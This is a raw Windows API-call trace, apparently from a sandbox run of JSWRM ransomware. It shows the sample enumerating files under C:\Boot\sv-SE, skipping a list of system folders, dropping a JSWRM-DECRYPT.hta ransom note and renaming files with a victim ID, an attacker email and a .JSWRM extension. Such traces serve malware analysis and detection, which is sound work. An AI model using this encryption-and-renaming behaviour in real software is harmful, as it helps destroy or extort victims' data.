[0064.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0064.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0064.328] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d008a68, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1d008a68, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1d008a68, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.328] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.328] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.328] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.328] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.328] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.328] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.328] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.328] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.329] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.329] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0064.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0064.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.329] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d008a68, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1d008a68, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1d008a68, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0064.329] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0064.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0064.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.329] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0064.329] lstrcmpiW (lpString1="sv-SE", lpString2=".") returned 1 [0064.329] lstrcmpiW (lpString1="sv-SE", lpString2="..") returned 1 [0064.329] lstrcmpiW (lpString1="sv-SE", lpString2="...") returned 1 [0064.329] lstrcmpiW (lpString1="sv-SE", lpString2="windows") returned -1 [0064.329] lstrcmpiW (lpString1="sv-SE", lpString2="recovery") returned 1 [0064.329] lstrcmpiW (lpString1="sv-SE", lpString2="perflogs") returned 1 [0064.329] lstrcmpiW (lpString1="sv-SE", lpString2="documents and settings") returned 1 [0064.329] lstrcmpiW (lpString1="sv-SE", lpString2="$RECYCLE.BIN") returned 1 [0064.329] lstrcmpiW (lpString1="sv-SE", lpString2="system volume information") returned -1 [0064.329] lstrcmpiW (lpString1="sv-SE", lpString2="msocache") returned 1 [0064.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237448 [0064.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.330] GetFileAttributesW (lpFileName="C:\\Boot\\sv-SE\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\sv-se\\jswrm-decrypt.hta")) returned 0xffffffff [0064.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237448 | out: hHeap=0x1e0000) returned 1 [0064.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0064.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0064.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0064.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.365] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\sv-se\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.366] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.366] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.367] CloseHandle (hObject=0x450) returned 1 [0064.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0064.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0064.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0064.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2374e8 [0064.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.368] GetFileAttributesW (lpFileName="C:\\Boot\\sv-SE\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\sv-se\\jswrm-decrypt.hta")) returned 0x20 [0064.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2374e8 | out: hHeap=0x1e0000) returned 1 [0064.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0064.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.369] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1d07b1af, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231c40 [0064.369] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.369] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1d07b1af, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.369] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.369] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.369] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.369] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.369] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.369] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.369] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.369] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.369] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.369] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.369] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.369] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.369] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0064.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0064.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0064.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0064.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.370] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.370] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0064.370] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.371] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.371] CloseHandle (hObject=0xffffffff) returned 1 [0064.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0064.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0064.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0064.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2261b0 [0064.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0064.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0064.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2261b0 | out: hHeap=0x1e0000) returned 1 [0064.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.371] MoveFileW (lpExistingFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0064.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.372] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d07b1af, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1d07b1af, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1d07b1af, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.372] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.372] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.372] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.372] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.372] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.372] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.372] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.372] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.372] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.372] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0064.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0064.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0064.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0064.373] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6a2250, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf98, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.373] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0064.373] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0064.373] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0064.373] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0064.373] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0064.373] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0064.373] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0064.373] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.373] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0064.373] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0064.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0064.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0064.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0064.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 